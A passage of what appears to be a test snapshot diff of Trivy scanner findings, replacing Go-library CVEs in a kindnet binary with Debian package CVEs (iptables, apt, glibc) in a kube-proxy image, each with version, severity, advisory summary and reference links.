"https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "iptables", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "iptables", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "1.8.2.2", + "packageName": "libapt-pkg5.0", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.0.6-9.2~deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3112-1", + "installedVersion": "1.0.6-9.2~deb10u1", + "packageName": "libbz2-1.0", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "bzip2 - bugfix update", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33574", + "installedVersion": "2.28-10", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-33574", + "https://linux.oracle.com/cve/CVE-2021-33574.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210629-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "https://www.cve.org/CVERecord?id=CVE-2021-33574", + ], + }, + "category": "Vulnerability", + "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: mq_notify does not handle separately allocated thread attributes", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://avd.aquasec.com/nvd/cve-2021-33574", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://access.redhat.com/security/cve/CVE-2021-33574", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20220209214540-3681064d5158", - "packageName": "golang.org/x/sys", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-35942", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "https://access.redhat.com/security/cve/CVE-2021-35942", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "https://linux.oracle.com/cve/CVE-2021-35942.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "https://security.gentoo.org/glsa/202208-24", + "https://security.netapp.com/advisory/ntap-20210827-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-35942", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "glibc: Arbitrary read in wordexp()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/issues/52313", - }, - { - "type": "URL", - "value": "https://go.dev/cl/399539", - }, - { - "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://avd.aquasec.com/nvd/cve-2021-35942", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://access.redhat.com/security/cve/CVE-2021-35942", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5699-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23218", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/security/cve/CVE-2022-23218", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "https://linux.oracle.com/cve/CVE-2022-23218.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-23218", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://access.redhat.com/security/cve/CVE-2022-23218", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-28948", - "installedVersion": "v3.0.0-20210107192922-496545a6307b", - "packageName": "gopkg.in/yaml.v3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 